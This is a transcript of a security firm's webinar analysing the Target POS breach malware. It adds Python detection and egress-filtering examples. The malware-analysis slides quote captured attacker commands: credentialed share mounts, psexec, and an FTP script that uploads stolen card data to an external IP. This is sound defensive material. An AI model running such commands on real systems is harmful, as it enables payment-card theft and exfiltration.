The Target Breach: Anatomy of an Attack

Posted on 15-Jan-2015


Alert Logic's Security Research Team examines the anatomy of a breach

Transcript of The Target Breach: Anatomy of an Attack

> www.alertlogic.com

The Target Data Breach: Anatomy of an Attack

Stephen Coty, Director, Threat Research

Diane Garey, Product Marketing

February 4, 2014


Today

Agenda
• What's in the News
• About POS Malware
• How the Malware Works
• How to Protect Yourself

Logistics
• Ask a question anytime using the "Question Box"
• Look for slides on the Alert Logic SlideShare account
• You'll get an email with a link to today's recording
• Live Tweet today's event: #AlertLogic_ACID


30 Days of the Target Breach

Timeline graphic with markers at Dec 18th, Jan 10th, Jan 15th and Jan 17th


You Never Want to Send This Communication


What's Being Reported

About the Attack
• Malicious software infects POS systems and sends credit card data via FTP
• Possibly a home-grown POS system running a Windows OS
• Malware traced to Russia and sold to 60 European cyber criminals

About the Impact
• 110 million customers affected
• Data being sold on the underground market
• Eight other retailers have been compromised
• Arrests being made of people using the cards


Malware for Sale

• Went into testing Feb 12, 2013 under the title "Dump CC memory grabber (pos-trojan)"
• Underground community laughed at the outrageous price
• Currently not being sold due to Ree[4] selling out buyers

Seller's feature list for the three editions (rough translation from the Russian advertisement):

Budget Version
• Implemented by sending via the FTP protocol
• Log is not encrypted
• 1st updated edition free
• Rebuild of the product $200 (max 3)
• No support
• $1800

Economy Version
• Implemented by sending via the FTP protocol
• Log encrypted with a cipher invented by us
• Free updates for 3 months; rebuild $100 (max 5)
• Support
• $2000

Full Version
• Sending through a gate
• Log encrypted with a cipher invented by us
• Free updates for life
• Further rebuilds $100 each
• $2300


More Malware Sales Details

• License agreement (translated from Russian):
– "You use the program on your own risk and creators assume no responsibility for your further use of this software. When buying, you automatically accept rules. Transfer programs and reselling third parties is prohibited and threatened deprivation of licenses and just what is included in your version."

• Seller Information
– E-mail 1: ree4@list.ru
– E-mail 2: ree4@yandex.ru
– ICQ: 565033
– Skype: s.r.a.ree4


Stolen Credit Cards are Selling for $15-60

Recent dumps: ~$15-60 range

Initial dumps: ~$12 average


How the Malware (Kaptoxa-Rescator) Works


Step 1. Infects POS system
• dum.exe executes mmom.exe

Step 2. Disables firewall and persists
• Creates an autorun entry to launch at boot

Step 3. Scrapes memory
• Scrapes tracks 1 & 2 of the credit card data from process memory

Step 4. Saves data
• To a default .dll file

Step 5. Establishes share
• net.exe/net1.exe creates a Windows share

Step 6. Stores and forwards data
• To an internal server as a .txt file; that server then sends the data to an external FTP server controlled by the attackers

Normal POS Activity: Pre-Infection

Post-Infection Activity: Step 1 (New Service)

Post-Infection Activity: Step 1.1 (Looks like a regular user; starts POSWDS)

Post-Infection Activity: Step 1.2

Filtering for commands (the commands below were issued and captured during malware analysis):

    cmd.exe /c move C:\WINDOWS\system32\net.EXE
    net start POSWDS
    C:\WINDOWS\system32\cmd.exe /c net use S: \\10.116.240.31\c$\WINDOWS\twain_32a.dll /user:ttcopscli3acs\Best1_user BackupU$

net.exe: establishes the Windows share

Post-Infection Activity: Step 2

BackDoor-FBPL takes the following actions:

Step 1:
    C:\WINDOWS\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\Best1_user -p BackupU$r cmd /c "taskkill /IM bladelogic.exe /F"
Step 2:
    c:\windows\system32\cmd.exe /c psexec /accepteula \10.116.240.3 -u ttcopscli3acs\Best1_user -p BackupU$r cmd -d bladelogic

BackDoor-FBPL sleeps until the predetermined times of 10:00am and 5:00pm, then runs:

Step 1:
    C:\WINDOWS\system32\cmd.exe /c move \\10.116.240.31\NT\twain_32a.dll C:\data_2014_1_20_17_53.txt
    (the file name is built from the system date and time)


BMC Whitepaper

Post-Infection Activity: Step 2 continued

Step 2: Write the FTP script to a text file (cmd.txt). ftp.exe reads it as if typed at the prompt: the host to open, then the username and password on their own lines, then the commands:

    open 199.188.204.182
    digitalw
    Crysis1089
    cd etc
    cd bin
    send C:\data_2014_1_20_17_53.txt
    quit

Step 3: Command line:
    c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt> c:\xxxxx\xxxxx\temp\cmd.txt
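The command lines in Steps 1.2 through 3 are exactly what a process-creation log (Sysmon event 1, or Windows 4688 with command-line auditing enabled) captures. As an added example that is not part of the deck or of Alert Logic's malware analysis, the Python detector below runs one rule per stage over constructed events, correlates the stages per host inside a time window so that a lone "net use" by an administrator does not page anyone, and parses a recovered ftp -s: script to pull out the destination host, account and file sent. Every host name, account, password, path and the 203.0.113.10 address is made up; only the command shapes follow the slides.

```python
import re
from datetime import datetime

# Constructed process-creation events (not Target telemetry): one per line,
# "timestamp<TAB>host<TAB>user<TAB>command line".
SAMPLE_EVENTS = """\
2014-01-20T17:53:02\tPOS-0117\tSYSTEM\tcmd.exe /c net use S: \\\\10.116.240.31\\c$\\WINDOWS /user:CORP\\svc_backup P@ssw0rd
2014-01-20T17:53:05\tPOS-0117\tSYSTEM\tcmd.exe /c psexec /accepteula \\\\10.116.240.31 -u CORP\\svc_backup -p P@ssw0rd cmd /c "taskkill /IM bladelogic.exe /F"
2014-01-20T17:53:09\tPOS-0117\tSYSTEM\tcmd.exe /c move \\\\10.116.240.31\\NT\\twain_32a.dll C:\\data_2014_1_20_17_53.txt
2014-01-20T17:53:11\tPOS-0117\tSYSTEM\tcmd.exe /c ftp -s:C:\\temp\\cmd.txt
2014-01-20T17:54:00\tPOS-0117\tjsmith\tnotepad.exe C:\\Users\\jsmith\\notes.txt
"""

# One rule per stage of the staging-and-exfiltration chain shown on the slides.
RULES = [
    ("admin-share-mount", "net use to an admin (c$) share with credentials on the command line",
     re.compile(r"\bnet1?(?:\.exe)?\s+use\s+\S+\s+\\\\\S+?\\c\$.*\s/user:", re.I)),
    ("psexec-taskkill", "psexec used to kill a process on another host",
     re.compile(r"\bpsexec\b.*\btaskkill\s+/IM\s+\S+", re.I)),
    ("dump-staged", "file moved from a share into a date-stamped data_*.txt",
     re.compile(r"\bmove\s+\\\\\S+\s+\S*data_\d{4}(?:_\d{1,2}){4}\.txt", re.I)),
    ("ftp-script", "ftp.exe driven by a script file (-s:)",
     re.compile(r"\bftp(?:\.exe)?\b.*\s-s:\S+", re.I)),
]
EXFIL_CHAIN = {"admin-share-mount", "dump-staged", "ftp-script"}


def parse_events(text: str) -> list:
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, host, user, cmd = line.split("\t", 3)
        events.append({"ts": datetime.fromisoformat(ts), "host": host, "user": user, "cmd": cmd})
    return events


def detect(events: list) -> list:
    """Run every rule over every command line; one hit per (event, rule) match."""
    hits = []
    for ev in events:
        for rule_id, desc, rx in RULES:
            if rx.search(ev["cmd"]):
                hits.append({"ts": ev["ts"], "host": ev["host"], "rule": rule_id,
                             "desc": desc, "cmd": ev["cmd"]})
    return hits


def correlate(hits: list, window_seconds: int = 600) -> list:
    """Hosts on which share mount, dump move and scripted ftp all fired inside one window.
    Each rule alone can be routine administration; the three together in minutes is the
    pattern the slides describe."""
    by_host = {}
    for h in hits:
        by_host.setdefault(h["host"], []).append(h)
    flagged = []
    for host, hs in by_host.items():
        chain = [h for h in hs if h["rule"] in EXFIL_CHAIN]
        if {h["rule"] for h in chain} != EXFIL_CHAIN:
            continue
        span = max(h["ts"] for h in chain) - min(h["ts"] for h in chain)
        if span.total_seconds() <= window_seconds:
            flagged.append(host)
    return flagged


def parse_ftp_script(script: str) -> dict:
    """Extract destination, account and uploaded files from an `ftp -s:` script:
    'open <host>' first, then the username and password lines (answers to the login
    prompts), then commands such as send/put."""
    lines = [ln.strip() for ln in script.splitlines() if ln.strip()]
    info = {"host": None, "user": None, "sent": []}
    rest = lines
    if lines and lines[0].lower().startswith("open "):
        info["host"] = lines[0].split(None, 1)[1]
        info["user"] = lines[1] if len(lines) > 1 else None
        rest = lines[3:]   # skip the host, user and password lines
    for line in rest:
        parts = line.split(None, 1)
        if parts[0].lower() in ("send", "put") and len(parts) == 2:
            info["sent"].append(parts[1])
    return info


# Constructed cmd.txt in the shape shown on the slide (host, account and password are made up).
SAMPLE_FTP_SCRIPT = "open 203.0.113.10\nexfil\nhunter2\ncd etc\ncd bin\nsend C:\\data_2014_1_20_17_53.txt\nquit\n"

if __name__ == "__main__":
    hits = detect(parse_events(SAMPLE_EVENTS))
    for h in hits:
        print(h["ts"], h["host"], h["rule"], "->", h["cmd"][:60])
    print("exfil chain on:", correlate(hits))
    print("ftp script:", parse_ftp_script(SAMPLE_FTP_SCRIPT))
```

The per-host correlation is the part worth copying: the individual commands (net use, psexec, move, ftp) are all legitimate tools, so alerting on any one of them in a retail estate drowns the SOC; alerting on the chain, scoped to the POS hosts and a short window, does not.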


Theory: How the Malware was Delivered

Ariba Vendor Portal


Theory: How the Malware was Delivered

Login to Portal


Theory: How the Malware was Injected

NCR POS Terminals


Evolution of Target POS Malware (timeline 2008, 2010, 2012, 2013)

• Memory Dumper: copies a specific process in memory
• DexterPOS: steals the process list from an infected machine while parsing memory dumps
• VSkimmer: detects card readers, grabs information, sends data to a control server
• AlinaPOS: v1 created; v2 encryption; v2.1 logging; v3.2 & 5.2 exfiltration
• BlackPOS / Kaptoxa / Rescator


Kaptoxa & Others Originated from Dexter

• Dexter:
– Able to read process memory from infected machines
– Parses memory dumps looking for tracks 1 & 2 of the credit card data
• Infected POS systems in 40 countries
– 42% of the infected systems were in North America
– 19% in the UK
• Targeted Windows OS


How to Mitigate Risk

• Scan POS systems with your choice of antivirus
• Check for, and remove, the autorun key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run with the value "svchit"
• Check for, and remove, three executables: %USERPROFILE%\svchst.exe, dum.exe and mmon.exe
• Disable outbound FTP from the POS systems at the network level rather than on the host itself (the malware disables the host firewall)
• Create a whitelist of acceptable external addresses using IP filtering rules or access control lists (ACLs)
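To make the last two bullets concrete, here is an added example, not Alert Logic's tooling, of the egress policy stated as code. It assumes a 10.116.0.0/16 POS range and two whitelisted external networks (a payment processor range and one patch server); both are invented for the example. FTP out of the POS range is denied regardless of destination, anything else external must match the whitelist, and the same policy is rendered as iptables FORWARD rules for a Linux gateway in front of the POS VLAN. Enforcement sits on the network because, as the malware flow earlier in the deck shows, the host firewall is among the first things the malware disables. The flow records are constructed.

```python
import ipaddress

# Assumed addressing for the example (not Target's).
POS_NETWORKS = [ipaddress.ip_network("10.116.0.0/16")]
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
ALLOWED_EXTERNAL = {
    "payment-processor": ipaddress.ip_network("198.51.100.0/24"),
    "patch-server": ipaddress.ip_network("203.0.113.5/32"),
}
FTP_PORTS = {20, 21}


def evaluate_flow(src: str, dst: str, dport: int, proto: str = "tcp") -> tuple:
    """Verdict for one outbound connection attempt: ('allow' | 'deny' | 'n/a', reason)."""
    s, d = ipaddress.ip_address(src), ipaddress.ip_address(dst)
    if not any(s in net for net in POS_NETWORKS):
        return ("n/a", "source is not a POS address; other policy applies")
    if any(d in net for net in INTERNAL):
        return ("allow", "internal destination (lateral-movement rules are separate)")
    if proto == "tcp" and dport in FTP_PORTS:
        return ("deny", "FTP leaving the POS network is blocked regardless of destination")
    for label, net in ALLOWED_EXTERNAL.items():
        if d in net:
            return ("allow", f"destination on external whitelist ({label})")
    return ("deny", "destination not on external whitelist")


def audit(flows: list) -> list:
    """Apply the policy to a batch of (src, dst, dport, proto) records; return the denials."""
    denied = []
    for src, dst, dport, proto in flows:
        verdict, reason = evaluate_flow(src, dst, dport, proto)
        if verdict == "deny":
            denied.append((src, dst, dport, reason))
    return denied


def render_iptables() -> list:
    """The same policy as FORWARD-chain rules on a gateway between the POS VLAN and the
    Internet. Order matters: the FTP drop precedes the whitelist accepts, so FTP is blocked
    even towards whitelisted hosts, and the final rule denies everything not matched."""
    rules = []
    for net in POS_NETWORKS:
        ports = ",".join(str(p) for p in sorted(FTP_PORTS))
        rules.append(f"iptables -A FORWARD -s {net} -p tcp -m multiport --dports {ports} -j DROP")
        for internal in INTERNAL:
            rules.append(f"iptables -A FORWARD -s {net} -d {internal} -j ACCEPT")
        for allowed in ALLOWED_EXTERNAL.values():
            rules.append(f"iptables -A FORWARD -s {net} -d {allowed} -j ACCEPT")
        rules.append(f"iptables -A FORWARD -s {net} -j DROP")
    return rules


# Constructed flow records (src, dst, dport, proto); 192.0.2.50 stands in for the attackers' FTP drop.
SAMPLE_FLOWS = [
    ("10.116.240.31", "192.0.2.50", 21, "tcp"),       # the exfil pattern from the slides: denied
    ("10.116.240.31", "198.51.100.20", 443, "tcp"),   # processor over HTTPS: allowed
    ("10.116.240.31", "198.51.100.20", 21, "tcp"),    # FTP even to the processor: denied
    ("10.116.240.31", "192.0.2.77", 443, "tcp"),      # unknown external host: denied
    ("10.116.240.31", "10.116.1.5", 445, "tcp"),      # internal share: allowed here
    ("10.50.1.9", "192.0.2.77", 21, "tcp"),           # not a POS source: not this policy's call
]

if __name__ == "__main__":
    for record in audit(SAMPLE_FLOWS):
        print("DENY", record)
    print("\n".join(render_iptables()))
```

Running `audit` over exported firewall or NetFlow records is also a cheap retrospective check: any POS source reaching port 21 outside the whitelist is worth an investigation, whichever product sits at the edge.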

Contact us for a copy of our

Malware Analysis Report


Credits to the Sources of Data

• http://www.alertlogic.com/data-breach-at-target-exposes-40-million-credit-cards/

• http://www.seculert.com/blog/2012/12/dexter-draining-blood-out-of-point-of-sales.html

• http://krebsonsecurity.com/2014/01/a-first-look-at-the-target-intrusion-malware/

• http://www.cyphort.com/blog/cyphort-tracks-down-new-variants-of-target-malware/

• http://www.tripwire.com/state-of-security/vulnerability-management/targets-point-sale-system-compromised/


Join Tomorrow's Webinar: Delivering Real Protection: Alert Logic Security-as-a-Service

• http://alrt.co/ThreatLogDemo
• Fully managed intrusion detection and log management
• Deploy anywhere your datacenter is located


Thank you!

To follow our research:
• #AlertLogic_ACID
• http://www.alertlogic.com/resources/blog/
• info@alertlogic.com, subject "Malware Analysis Report"